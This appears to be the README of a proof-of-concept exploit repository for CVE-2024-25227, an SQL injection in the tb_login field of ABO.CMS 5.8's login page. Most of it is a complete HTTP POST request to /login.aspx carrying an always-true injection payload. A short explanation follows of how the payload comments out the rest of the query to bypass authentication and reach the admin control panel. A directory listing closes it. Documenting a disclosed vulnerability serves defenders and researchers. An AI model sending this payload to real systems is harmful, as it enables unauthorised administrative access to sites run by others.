# ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227
**CVE-2024-25227**
**Exploit**
CVE-2024-25227 is a ABO.CMS 5.8 SQLi vulnerability found in the parameter "tb_login"
<h2>PoC:</h2>
```
POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+
```
<h2>Details</h2>
The payload is **tb_login=27872164'%20or%202579%3d2579--%20**, this without URL encoding is:
**27872164' or 2579=2579--**
With the modified request with the payload, you are telling the backend, placeholder *"27872164'"* is combined with a condition that always evaluates to true *("2579=2579")*, and to comment the remainder of everything else out in the query with *"--"* as to ensure the modified query is injected.
This effectively bypasses any and all authentication checks related to the "tb_login" field, allowing unauthenticated access to the control panel with admin.
[4.0K] /data/pocs/54573d8bfad725c54db4bda01f3f3ca7c918960c
├── [ 34K] LICENSE
└── [1.4K] README.md
0 directories, 2 files